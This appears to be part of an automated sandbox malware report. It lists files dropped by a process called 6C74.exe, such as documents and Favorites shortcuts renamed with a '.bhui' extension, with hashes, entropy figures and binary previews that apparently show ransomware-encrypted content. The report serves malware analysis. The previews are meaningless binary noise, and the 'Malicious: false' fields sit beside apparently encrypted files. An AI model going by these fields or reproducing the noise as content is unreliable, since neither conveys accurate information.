SHA1:	7F95F88D6229717B30AF3941684FBBA1ED6B30B3
SHA-256:	48499792E13205B897B046373087CE23E9FE2717D56D0F11B355DF4040A64518
SHA-512:	80A863BCAF1DBCDE4A3941D7BAED39BF16C79039F25F43A2642F331524C4B1248D8B26BA87234041E6A249BE6CB9B449C6E3FF04CD8619950C932BF55A2083A9
Malicious:	false
Reputation:	unknown
Preview:	ZIPXY4"z.].. 3.../..3...Y..4.+.G{...GEG....[.%..v.w.)70...E...~..e..GS.m..#C.\|p.......u.....M....7..T../g/..h.........OT.7.vN.3.4..TW...iQ#..11..&FO..%\|!.Q.^....w^2..;p.$...o..j...b..............nG8t..!..e....I.6..,...d.0L....J<a.N....'.3i..m....fLJ.t.q.....e...\+YxW.j=...(K@..,...Y3D.G...D#N.Z;..F.5....W....d>.d.^~T..~.....l.........8.3 Mb..g....m}..l............#16K....y....B#.l...v.&....../I./......Q.....0....8Xd.f...&Utra.c72._ "./.]2.YqG.n...lH.A..1.3....i./t..a....w#..!...q....A.............4K........L3&.....B.vt..y..4.:..."..Fm.....<(.m.7..b....@$.I"Xr:f_....k.....iJn.r.!.....CqsT/&.xp.A.F..C.h.........U.FfH~....P..LZ....>..7.....>...I....I.r.R..^..-.....w...9.....^F?N..z.-..K...}.Dmh..42..O...v....tE.....k.@"..}...XJ....:..C9\II.#{iu.M.F.m..i.1#.ccg.W.....& ..$[..(]z..Ac......G.@M4.........m.<.O..K..."..v..k...Xs.l.....81.K.C.k..Ua.wr.:....}.e.....l.TG..b.wz.W.^....b[.\e Cb.@..z..u....h.S.&8p&......y..J.....$\..m....N

C:\Users\user\Downloads\ZIPXYXWIOY.docx.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8534004594616675
Encrypted:	false
SSDEEP:	24:ve7mcNnFc4CGgZeLXpAnmzz9xiKfCgGWh91Jbe/GdcZbiUN35WSOOWbD:m7BdFcggZeLLz9xtfCgVdc4yO7D
MD5:	1FC6CF639B7A65BF9C189535572B6C1E
SHA1:	7F95F88D6229717B30AF3941684FBBA1ED6B30B3
SHA-256:	48499792E13205B897B046373087CE23E9FE2717D56D0F11B355DF4040A64518
SHA-512:	80A863BCAF1DBCDE4A3941D7BAED39BF16C79039F25F43A2642F331524C4B1248D8B26BA87234041E6A249BE6CB9B449C6E3FF04CD8619950C932BF55A2083A9
Malicious:	false
Reputation:	unknown
Preview:	ZIPXY4"z.].. 3.../..3...Y..4.+.G{...GEG....[.%..v.w.)70...E...~..e..GS.m..#C.\|p.......u.....M....7..T../g/..h.........OT.7.vN.3.4..TW...iQ#..11..&FO..%\|!.Q.^....w^2..;p.$...o..j...b..............nG8t..!..e....I.6..,...d.0L....J<a.N....'.3i..m....fLJ.t.q.....e...\+YxW.j=...(K@..,...Y3D.G...D#N.Z;..F.5....W....d>.d.^~T..~.....l.........8.3 Mb..g....m}..l............#16K....y....B#.l...v.&....../I./......Q.....0....8Xd.f...&Utra.c72._ "./.]2.YqG.n...lH.A..1.3....i./t..a....w#..!...q....A.............4K........L3&.....B.vt..y..4.:..."..Fm.....<(.m.7..b....@$.I"Xr:f_....k.....iJn.r.!.....CqsT/&.xp.A.F..C.h.........U.FfH~....P..LZ....>..7.....>...I....I.r.R..^..-.....w...9.....^F?N..z.-..K...}.Dmh..42..O...v....tE.....k.@"..}...XJ....:..C9\II.#{iu.M.F.m..i.1#.ccg.W.....& ..$[..(]z..Ac......G.@M4.........m.<.O..K..."..v..k...Xs.l.....81.K.C.k..Ua.wr.:....}.e.....l.TG..b.wz.W.^....b[.\e Cb.@..z..u....h.S.&8p&......y..J.....$\..m....N

C:\Users\user\Downloads\ZIPXYXWIOY.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.842834075357865
Encrypted:	false
SSDEEP:	24:97Wud1QeqJpSiYhp7yjBGTn7pBpf2EEUhElMx3pUU7pjPq18bvqf2YPeRWbD:FMpSZyjBq7pfv3El8pUKM8bvq+EeuD
MD5:	CBFD7242D39721018ABE4C0825EA5F6A
SHA1:	2359950FA852A091122FDE6F05C207CD849DFC5E
SHA-256:	FD5E693B3FF217069E82F48E9321DDB9C7FD93FD9C2A8C573CF3BB0112959E12
SHA-512:	2BEC2E5680B60CC7E2F48C56994C13F126A6F41E9C932E89D15F8057370BC7D64661F7ABBC2402B946B8D34190AD3E208399A42F7EBC5A3D1C89376E92051221
Malicious:	false
Reputation:	unknown
Preview:	ZIPXY_.n.1f.4.......$.2md0.E Q.J..$...z.&..x.u...y.RG..P.._P....i.....5......k..#...+..l.......:Y..........z`..[.U.~c.#.p.....~..873..oc.oJFI...QK.V.m#...d...C.An........t.....~.E.2.T.J..+.:..h-...#.h6pE..Q.I.$.F;.(.j.r....9...o.NeX.O_...1....Y..........i.If.1.....H.lX.....x.M..`...40}..G..{a...Ms...O..C...\|I..).\D.:y..N~.@...5.5....c}EH...a=:=...Qr..`....kb...{TG....uz.......".....\|?P..)\|Ok..z>..!}.U..S}....AT.S.W..3.'.SNy...?&....?..].p.).U..8.?W.......vg..Q..H!...U0J.z%.!...1.$DV...ic.l..33....G....\|E....o....vW......./...!'z}..;j..q.b@.....k........,..6V...^.h.3M.x.U?...#6.0..........-G.....w!gDN.f.\Z..."........J.y.~...)...Y......<..!..q.%.+..RJ...%QXy&N..0.6..~...U....4ZPV'...@..C>....%.. ...E}j~n.@gz%.Bb.{..P..V.I.v'.Y[(._H(..rU.-]...:B:.@.B...% P.....P.1.`\|...$..g.t..@3.#.<@.@0m`..8.8...QG...d...q,..Z/.A..7..6dx=C.!Oc./...(..h...?jcC`..zM..b..H%F.b.C{.....h.*.>o....ES..2.....K1.-%.adN(w9[...#....r.g..D-/....z.).[.....%.b.

C:\Users\user\Downloads\ZIPXYXWIOY.pdf.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.842834075357865
Encrypted:	false
SSDEEP:	24:97Wud1QeqJpSiYhp7yjBGTn7pBpf2EEUhElMx3pUU7pjPq18bvqf2YPeRWbD:FMpSZyjBq7pfv3El8pUKM8bvq+EeuD
MD5:	CBFD7242D39721018ABE4C0825EA5F6A
SHA1:	2359950FA852A091122FDE6F05C207CD849DFC5E
SHA-256:	FD5E693B3FF217069E82F48E9321DDB9C7FD93FD9C2A8C573CF3BB0112959E12
SHA-512:	2BEC2E5680B60CC7E2F48C56994C13F126A6F41E9C932E89D15F8057370BC7D64661F7ABBC2402B946B8D34190AD3E208399A42F7EBC5A3D1C89376E92051221
Malicious:	false
Reputation:	unknown
Preview:	ZIPXY_.n.1f.4.......$.2md0.E Q.J..$...z.&..x.u...y.RG..P.._P....i.....5......k..#...+..l.......:Y..........z`..[.U.~c.#.p.....~..873..oc.oJFI...QK.V.m#...d...C.An........t.....~.E.2.T.J..+.:..h-...#.h6pE..Q.I.$.F;.(.j.r....9...o.NeX.O_...1....Y..........i.If.1.....H.lX.....x.M..`...40}..G..{a...Ms...O..C...\|I..).\D.:y..N~.@...5.5....c}EH...a=:=...Qr..`....kb...{TG....uz.......".....\|?P..)\|Ok..z>..!}.U..S}....AT.S.W..3.'.SNy...?&....?..].p.).U..8.?W.......vg..Q..H!...U0J.z%.!...1.$DV...ic.l..33....G....\|E....o....vW......./...!'z}..;j..q.b@.....k........,..6V...^.h.3M.x.U?...#6.0..........-G.....w!gDN.f.\Z..."........J.y.~...)...Y......<..!..q.%.+..RJ...%QXy&N..0.6..~...U....4ZPV'...@..C>....%.. ...E}j~n.@gz%.Bb.{..P..V.I.v'.Y[(._H(..rU.-]...:B:.@.B...% P.....P.1.`\|...$..g.t..@3.#.<@.@0m`..8.8...QG...d...q,..Z/.A..7..6dx=C.!Oc./...(..h...?jcC`..zM..b..H%F.b.C{.....h.*.>o....ES..2.....K1.-%.adN(w9[...#....r.g..D-/....z.).[.....%.b.

C:\Users\user\Favorites\Amazon.url

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	445
Entropy (8bit):	7.42582085199142
Encrypted:	false
SSDEEP:	12:j7lT+dlMWqn4fFKrWN/UDi5ZrvNlWcii9a:jJaPs4fkvDi7TzWbD
MD5:	0EC0D8808C4FFEB3953C7D38847B1DEF
SHA1:	C7B71AC0F272BAC11FE4DE9EDECD65B056BA9129
SHA-256:	F6794A9C01C874EACD47DF96227540D066BB6948B2C2C5563E547662419AF0FE
SHA-512:	9B9E67BBA74648CE0227FE960BFE7985813005427F32CD9647FC0DB91543B7F98CD25943EF07011FD3949DE8B599BD876B58739E7E749A9FC31D122C9E8B89E4
Malicious:	false
Reputation:	unknown
Preview:	[{000...k.;.T..%.m...D+.,..>....M......h@H.....]W.g.g.......8Q.s.......i.[.ZW..tG.4U#.....Td....WWh~...6$m.'..~..[..U.N....Bu=....h....CR)..#.3=......0.MH..@....}.....{..........8....u..6. ......6......,..T._.x^.~e .O>.=I.....U.v...!..T.0.K7..b.!....B.i....NE...\..5....gm..i.L...3..`h.PZ....BwK...i.0qx".X.N.*.........4w...F..5W{..w..[=!a2.T>.Z..W..lfyRgbm7aZ5zpjJggzyGva9vFH6Xpmk3xwjgrUmT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Amazon.url.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	445
Entropy (8bit):	7.42582085199142
Encrypted:	false
SSDEEP:	12:j7lT+dlMWqn4fFKrWN/UDi5ZrvNlWcii9a:jJaPs4fkvDi7TzWbD
MD5:	0EC0D8808C4FFEB3953C7D38847B1DEF
SHA1:	C7B71AC0F272BAC11FE4DE9EDECD65B056BA9129
SHA-256:	F6794A9C01C874EACD47DF96227540D066BB6948B2C2C5563E547662419AF0FE
SHA-512:	9B9E67BBA74648CE0227FE960BFE7985813005427F32CD9647FC0DB91543B7F98CD25943EF07011FD3949DE8B599BD876B58739E7E749A9FC31D122C9E8B89E4
Malicious:	false
Reputation:	unknown
Preview:	[{000...k.;.T..%.m...D+.,..>....M......h@H.....]W.g.g.......8Q.s.......i.[.ZW..tG.4U#.....Td....WWh~...6$m.'..~..[..U.N....Bu=....h....CR)..#.3=......0.MH..@....}.....{..........8....u..6. ......6......,..T._.x^.~e .O>.=I.....U.v...!..T.0.K7..b.!....B.i....NE...\..5....gm..i.L...3..`h.PZ....BwK...i.0qx".X.N.*.........4w...F..5W{..w..[=!a2.T>.Z..W..lfyRgbm7aZ5zpjJggzyGva9vFH6Xpmk3xwjgrUmT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Bing.url

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	542
Entropy (8bit):	7.617039696614288
Encrypted:	false
SSDEEP:	12:5RelCI3gQZpth0qRsP9uNLlAyOxV8A1nNp4gWcii9a:5UgrQPosFNLadx+CQgWbD
MD5:	1F30A948C43F8B017FA413E07A513250
SHA1:	37C2D8C7966F0A2CCC49AC78B3D957B056519C3E
SHA-256:	4C3E5701CF718E921E49BBBE9BA656B6F6E977C15A72F0B58F9865225C48028D
SHA-512:	5E389992AFAC6BBC9F1E149E94565AF3F1BB77C28F2EBEF6131506107ACCDF547C5EEDFBFED257CEF2A9ADC21ED1E1A47EAAC2A466693A7A79FF6A1C74B7473B
Malicious:	false
Reputation:	unknown
Preview:	[{000..0`#.`.U........u...$.mN.Y0J\|@.."'...b...:.b!-...U......q.@..../.9)9....}..}...rG.^=.Z.D.....(.$. 2...o...c....~..^k5.F*../7.9wd.U5....f...nd.:#.zi...cugP}..{}N.......1..........3.U.....Yj.#....3./........2r.Vu..l.W:KN....X.O..5O).i........l.H.,.o..]nU......M.."p._K^v.T..o4s.O.BZ.tH...........%...?.^...t..6...........?..>j.$.....B.lh..7%..q.1.'.D.]/r.V.H...Y.%..e.+N._..U........[[.pYG8....S.J..r<........y...(G......}......).lfyRgbm7aZ5zpjJggzyGva9vFH6Xpmk3xwjgrUmT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Bing.url.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	542
Entropy (8bit):	7.617039696614288
Encrypted:	false
SSDEEP:	12:5RelCI3gQZpth0qRsP9uNLlAyOxV8A1nNp4gWcii9a:5UgrQPosFNLadx+CQgWbD
MD5:	1F30A948C43F8B017FA413E07A513250
SHA1:	37C2D8C7966F0A2CCC49AC78B3D957B056519C3E
SHA-256:	4C3E5701CF718E921E49BBBE9BA656B6F6E977C15A72F0B58F9865225C48028D
SHA-512:	5E389992AFAC6BBC9F1E149E94565AF3F1BB77C28F2EBEF6131506107ACCDF547C5EEDFBFED257CEF2A9ADC21ED1E1A47EAAC2A466693A7A79FF6A1C74B7473B
Malicious:	false
Reputation:	unknown
Preview:	[{000..0`#.`.U........u...$.mN.Y0J\|@.."'...b...:.b!-...U......q.@..../.9)9....}..}...rG.^=.Z.D.....(.$. 2...o...c....~..^k5.F*../7.9wd.U5....f...nd.:#.zi...cugP}..{}N.......1..........3.U.....Yj.#....3./........2r.Vu..l.W:KN....X.O..5O).i........l.H.,.o..]nU......M.."p._K^v.T..o4s.O.BZ.tH...........%...?.^...t..6...........?..>j.$.....B.lh..7%..q.1.'.D.]/r.V.H...Y.%..e.+N._..U........[[.pYG8....S.J..r<........y...(G......}......).lfyRgbm7aZ5zpjJggzyGva9vFH6Xpmk3xwjgrUmT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Facebook.url

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	447
Entropy (8bit):	7.447181206110842
Encrypted:	false
SSDEEP:	12:sv/U8WqQsmy1vIIU+FYwnuMK//4BpWAlXT2EsLAbTDWcii9a:+88WqrmIU+FnuM24BlNSSWbD
MD5:	3BAE2D0841B289F866ED8D830C277C79
SHA1:	FE7B70A3B84CF900B92B7B2F6A1B59FD7F2304A3
SHA-256:	F86F485C615AE247C2D3044369B0EC63CBC66E928B47D056F92487CA4BEB1155
SHA-512:	323A757B3B3863D550254A47A45DC1B9C07440AFEBCC63AFDB01DD7549F340590B5B1D0952ECA27A44FA94B764EB20B77E9DDCF9EA2FDC1F4C59C5D1ADC6F91A
Malicious:	false
Reputation:	unknown
Preview:	[{000X.M9)\.y.+.";.g%..7.)....6uL.....Pk..{.#.i..r..+..s..\H.6...n.....R..m.v..2ZlF.....c.fic..9yr.......l...b2..3R0....M..@.\.....(N.h...4....waN2A.\.P.rKpQsP.{6Y.e....DS.....IP+..oMQ.3....b.....w..{..D}.P" ~....>..7/.fo......,...=.F...\|[.j..u.r0L...}jmb[.Y..[..S.cw.....v..6.S..z..........N..Id.$n..y......$....^.0II....4.........v,%6*....M.?./lfyRgbm7aZ5zpjJggzyGva9vFH6Xpmk3xwjgrUmT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Facebook.url.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	447
Entropy (8bit):	7.447181206110842
Encrypted:	false
SSDEEP:	12:sv/U8WqQsmy1vIIU+FYwnuMK//4BpWAlXT2EsLAbTDWcii9a:+88WqrmIU+FnuM24BlNSSWbD
MD5:	3BAE2D0841B289F866ED8D830C277C79
SHA1:	FE7B70A3B84CF900B92B7B2F6A1B59FD7F2304A3
SHA-256:	F86F485C615AE247C2D3044369B0EC63CBC66E928B47D056F92487CA4BEB1155
SHA-512:	323A757B3B3863D550254A47A45DC1B9C07440AFEBCC63AFDB01DD7549F340590B5B1D0952ECA27A44FA94B764EB20B77E9DDCF9EA2FDC1F4C59C5D1ADC6F91A
Malicious:	false
Reputation:	unknown
Preview:	[{000X.M9)\.y.+.";.g%..7.)....6uL.....Pk..{.#.i..r..+..s..\H.6...n.....R..m.v..2ZlF.....c.fic..9yr.......l...b2..3R0....M..@.\.....(N.h...4....waN2A.\.P.rKpQsP.{6Y.e....DS.....IP+..oMQ.3....b.....w..{..D}.P" ~....>..7/.fo......,...=.F...\|[.j..u.r0L...}jmb[.Y..[..S.cw.....v..6.S..z..........N..Id.$n..y......$....^.0II....4.........v,%6*....M.?./lfyRgbm7aZ5zpjJggzyGva9vFH6Xpmk3xwjgrUmT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Google.url

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	445
Entropy (8bit):	7.454866183370879
Encrypted:	false
SSDEEP:	12:jE9g+hcxAjlssedZlU5L3DiPLJTB97DGVjU3oZWcii9a:j+8mjS5X6V3DiPz9HcjUYZWbD
MD5:	0EE41474CCAF93B42B5C82DC1A966EB0
SHA1:	90FF0FF8DFA4594CE61E12254F2B4577D7AF3C7E
SHA-256:	DE10768CA8B08E1DF7A983E490E97722D011E8B3697AC7847AD4665AE6DEC7BB
SHA-512:	A5F219916FA31AA8E297D596BA1E9E0B7B2DFCEC2FEF328806C8132FEA874625DB7934522752D07C4DE8B40265546164433073DEF41C0A59718CFBFAD445F0FB
Malicious:	false
Reputation:	unknown
Preview:	[{000.j..Ye.{..g~....].....X{Yl...]..<..8.H..g.A.>..y0.....A2.u6..Z'.......R+^..Q%.M.`j..yC.....\|.a.\|6:.{IyI...5xD...s.E..1S.Q$W...e.../.......L.....g2...4...`'^0OFH..Q..^.......yA..0O.{fA...$.0.p^..#.BZL9.K.0....".'...$[J.*e.f%...!..G.-....]....[e.h...g....o...w.d...X..w.u..,@r.4..-......`:?.......B..m...E.O.W..48>..iD.l...=.....>{.Rq."Y......P.lfyRgbm7aZ5zpjJggzyGva9vFH6Xpmk3xwjgrUmT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Google.url.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	445
Entropy (8bit):	7.454866183370879
Encrypted:	false
SSDEEP:	12:jE9g+hcxAjlssedZlU5L3DiPLJTB97DGVjU3oZWcii9a:j+8mjS5X6V3DiPz9HcjUYZWbD
MD5:	0EE41474CCAF93B42B5C82DC1A966EB0
SHA1:	90FF0FF8DFA4594CE61E12254F2B4577D7AF3C7E
SHA-256:	DE10768CA8B08E1DF7A983E490E97722D011E8B3697AC7847AD4665AE6DEC7BB
SHA-512:	A5F219916FA31AA8E297D596BA1E9E0B7B2DFCEC2FEF328806C8132FEA874625DB7934522752D07C4DE8B40265546164433073DEF41C0A59718CFBFAD445F0FB
Malicious:	false
Reputation:	unknown
Preview:	[{000.j..Ye.{..g~....].....X{Yl...]..<..8.H..g.A.>..y0.....A2.u6..Z'.......R+^..Q%.M.`j..yC.....\|.a.\|6:.{IyI...5xD...s.E..1S.Q$W...e.../.......L.....g2...4...`'^0OFH..Q..^.......yA..0O.{fA...$.0.p^..#.BZL9.K.0....".'...$[J.*e.f%...!..G.-....]....[e.h...g....o...w.d...X..w.u..,@r.4..-......`:?.......B..m...E.O.W..48>..iD.l...=.....>{.Rq."Y......P.lfyRgbm7aZ5zpjJggzyGva9vFH6Xpmk3xwjgrUmT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Live.url

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	443
Entropy (8bit):	7.4998563418547
Encrypted:	false
SSDEEP:	6:JBH9gmYAao6DjsmS3YFajUbMsnmyFvX1ahX99l5Y2S3QU7YHGQvm3hE7cfgpfWcq:nH6Bf3S3YFajUua1aB9942S3BYWcii9a
MD5:	B6F4BD769E3CC64D71D4C8650C071785
SHA1:	2ABD498E13AFD31434D3A77F33FBCFE81163F75B
SHA-256:	952DEB4C46B96F260ECB91311922F1290B373F9A0F5675759DF08C78F9425925
SHA-512:	52DAC29D048357324D0D2FE8DF8D7EA02474263A3BD2E0DA55054B143C7F6128F3F7F1A96BA99D7271EB4CA008321F38DE0721C3AB56C8CEFF033F4DA786D8B7
Malicious:	false
Reputation:	unknown
Preview:	[{000.;nPxp..,;.2.;w.....f.........0.v.X~`j2....<..[#Y..]8".D[..6._/...s.....fst....cp-.j...M.v.v%C.#..Y... .......=.d..P...^..eB.<.B.@.).W.t..Y..i.I.......0........{6.."?!n~%.........V....i.~%......B).....BB..B......f"T..\.2..m.h..E..E...4.....n{I._:FX..u.{@&.+..c.*..aUB...5d...>.x.9"...L?.s1)b..^...X........:.tDG.d.G_....T...w...!.5..)....r.lfyRgbm7aZ5zpjJggzyGva9vFH6Xpmk3xwjgrUmT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Live.url.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	443
Entropy (8bit):	7.4998563418547
Encrypted:	false
SSDEEP:	6:JBH9gmYAao6DjsmS3YFajUbMsnmyFvX1ahX99l5Y2S3QU7YHGQvm3hE7cfgpfWcq:nH6Bf3S3YFajUua1aB9942S3BYWcii9a
MD5:	B6F4BD769E3CC64D71D4C8650C071785
SHA1:	2ABD498E13AFD31434D3A77F33FBCFE81163F75B
SHA-256:	952DEB4C46B96F260ECB91311922F1290B373F9A0F5675759DF08C78F9425925
SHA-512:	52DAC29D048357324D0D2FE8DF8D7EA02474263A3BD2E0DA55054B143C7F6128F3F7F1A96BA99D7271EB4CA008321F38DE0721C3AB56C8CEFF033F4DA786D8B7
Malicious:	false
Reputation:	unknown
Preview:	[{000.;nPxp..,;.2.;w.....f.........0.v.X~`j2....<..[#Y..]8".D[..6._/...s.....fst....cp-.j...M.v.v%C.#..Y... .......=.d..P...^..eB.<.B.@.).W.t..Y..i.I.......0........{6.."?!n~%.........V....i.~%......B).....BB..B......f"T..\.2..m.h..E..E...4.....n{I._:FX..u.{@&.+..c.*..aUB...5d...>.x.9"...L?.s1)b..^...X........:.tDG.d.G_....T...w...!.5..)....r.lfyRgbm7aZ5zpjJggzyGva9vFH6Xpmk3xwjgrUmT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\NYTimes.url

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	446
Entropy (8bit):	7.460833477445108
Encrypted:	false
SSDEEP:	12:qnmlp0nlPgJA2u2chdmJgZXuCR0e8OWcii9a:rri2u7dmeVv/WbD
MD5:	CF435D3E0E8B22CC841B50C3F6FAD8CD
SHA1:	51074DB0EA6DDF6FBDF32604C5E46243F8E940A1
SHA-256:	9D0D3FD40EFCED1E19C8992EA22F911F8C0A375B4927F1DBF266E04223B384B7
SHA-512:	CD77265E16D575F7F06BA63521B6A81EB2A3194C8D3ABEB45C1B582A4296EF96C239F5DF4E106BB42C85409C6933608F5CA93A9AFB04EFB28133D72880B54E09
Malicious:	false
Reputation:	unknown
Preview:	[{000T......t....a."2H+<B....u.?.'..CG.n.tk............6...b....)A.q..T'..;.{=$^\|... ....}a..0..3..X.f.{.2...(.....J.+...o....e.}p..!t+.....R.h.w.=......h-&A..q..G....1..~Q.i....p.......!?.....w......t]..x......!#A,..........[g..i...6...<R.""....5.@>..k....Tk.....p}2]-.r\.98....Xu.....X8-x.>Q7.B....O../.ho3T.N.....Q..k...b......M..g..".t.Z.jlfyRgbm7aZ5zpjJggzyGva9vFH6Xpmk3xwjgrUmT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\NYTimes.url.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	446
Entropy (8bit):	7.460833477445108
Encrypted:	false
SSDEEP:	12:qnmlp0nlPgJA2u2chdmJgZXuCR0e8OWcii9a:rri2u7dmeVv/WbD
MD5:	CF435D3E0E8B22CC841B50C3F6FAD8CD
SHA1:	51074DB0EA6DDF6FBDF32604C5E46243F8E940A1
SHA-256:	9D0D3FD40EFCED1E19C8992EA22F911F8C0A375B4927F1DBF266E04223B384B7
SHA-512:	CD77265E16D575F7F06BA63521B6A81EB2A3194C8D3ABEB45C1B582A4296EF96C239F5DF4E106BB42C85409C6933608F5CA93A9AFB04EFB28133D72880B54E09
Malicious:	false
Reputation:	unknown
Preview:	[{000T......t....a."2H+<B....u.?.'..CG.n.tk............6...b....)A.q..T'..;.{=$^\|... ....}a..0..3..X.f.{.2...(.....J.+...o....e.}p..!t+.....R.h.w.=......h-&A..q..G....1..~Q.i....p.......!?.....w......t]..x......!#A,..........[g..i...6...<R.""....5.@>..k....Tk.....p}2]-.r\.98....Xu.....X8-x.>Q7.B....O../.ho3T.N.....Q..k...b......M..g..".t.Z.jlfyRgbm7aZ5zpjJggzyGva9vFH6Xpmk3xwjgrUmT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Reddit.url

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	445
Entropy (8bit):	7.424777271212297
Encrypted:	false
SSDEEP:	6:JHMp+uG+Z/d8/oxKRm8gJ3UVEHri9Hln3nhf81UK7nEsa3cfgpfWcii96Z:oa+ZFYRm93gBF6RbjWWcii9a
MD5:	2ACD85B276A982C6C0555FC13E7DB4CA
SHA1:	D03C5E67657362E9DA2850EEE23E9812F0072F89
SHA-256:	CE0E6C6A0F9C703BAC55D5BD6800D840B7DBFE5A9360BB9681BF2BD1E263B7AD
SHA-512:	7CA65968441ADF4C1FC36FE99B8EB8D5CF5D4F7C76F102C2C633438223EF8E4E4131CD02D1F7E71E22471E7E5012FAB3EE5F6FAAA450108D4CD68BE6B56F1E25
Malicious:	false
Reputation:	unknown
Preview:	[{000W..,'.=..p1.$Ly..a.pr_^.q!..R...T..<>..g....+(M......'.1C.....g)T..zm.\|es....t..^W...`..E+...I.B%....K.Cs..x..K....JZ.......q.J..=........r.D.n$.......F>0..6..b..lb^.@B.....r.[.._...%..&..H.z.g.fI.V...7C."....o.7.1.U....&e....x'....a3...T.]Da.....K,7..8.3.......k;+\.G$g......}..u...R..8.~H.....\7.(-xj...........p.a}q4.&i.SCS66.\..#......!BlfyRgbm7aZ5zpjJggzyGva9vFH6Xpmk3xwjgrUmT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Reddit.url.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	445
Entropy (8bit):	7.424777271212297
Encrypted:	false
SSDEEP:	6:JHMp+uG+Z/d8/oxKRm8gJ3UVEHri9Hln3nhf81UK7nEsa3cfgpfWcii96Z:oa+ZFYRm93gBF6RbjWWcii9a
MD5:	2ACD85B276A982C6C0555FC13E7DB4CA
SHA1:	D03C5E67657362E9DA2850EEE23E9812F0072F89
SHA-256:	CE0E6C6A0F9C703BAC55D5BD6800D840B7DBFE5A9360BB9681BF2BD1E263B7AD
SHA-512:	7CA65968441ADF4C1FC36FE99B8EB8D5CF5D4F7C76F102C2C633438223EF8E4E4131CD02D1F7E71E22471E7E5012FAB3EE5F6FAAA450108D4CD68BE6B56F1E25
Malicious:	false
Reputation:	unknown
Preview:	[{000W..,'.=..p1.$Ly..a.pr_^.q!..R...T..<>..g....+(M......'.1C.....g)T..zm.\|es....t..^W...`..E+...I.B%....K.Cs..x..K....JZ.......q.J..=........r.D.n$.......F>0..6..b..lb^.@B.....r.[.._...%..&..H.z.g.fI.V...7C."....o.7.1.U....&e....x'....a3...T.]Da.....K,7..8.3.......k;+\.G$g......}..u...R..8.~H.....\7.(-xj...........p.a}q4.&i.SCS66.\..#......!BlfyRgbm7aZ5zpjJggzyGva9vFH6Xpmk3xwjgrUmT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Twitter.url

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	446
Entropy (8bit):	7.404303868042479
Encrypted:	false
SSDEEP:	12:SsZEPNXUlG+gX7AqW/6obu51eiClBhH1NrKwOWcii9a:SWgX7AbbnlBHN21WbD
MD5:	3395D605699597C73207D82027E0C115
SHA1:	C661AB960CCA76BB5AE73B1C109CC65EF13C0C15
SHA-256:	9C52677B96C22F99FD28412BF6BBBE4E76A1AEB009CFAD0CB70D187C6C219A54
SHA-512:	6EDE26D5F249BC211CD06A70DE8D5501BEC657A01701832C747D6427DBD3307B873537B088D7F98C1E8329C5B37AA88CF503F12D9FDCD83DB9DC497BF6000485
Malicious:	false
Reputation:	unknown
Preview:	[{000..p.[.#.cUD-...v..0.\|L......#).\|.%...#....^.......'.m^y...`<........+..o..3....TDI...K..57D..A........14......y..C/..9.........S..h5..#....hWj....l.{).=AF.O..6#vw.W:..y......R@V4N...=..y]...@..X.....#...O..m...'..7...4..q.n.N.j.Q..N..o.@+..-.k.....,....=....$..`b.=EU......;t}X..%Ci/..B..R#..e.....Q{..*....9......ef.rj....-N..y<1...H...h...lfyRgbm7aZ5zpjJggzyGva9vFH6Xpmk3xwjgrUmT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

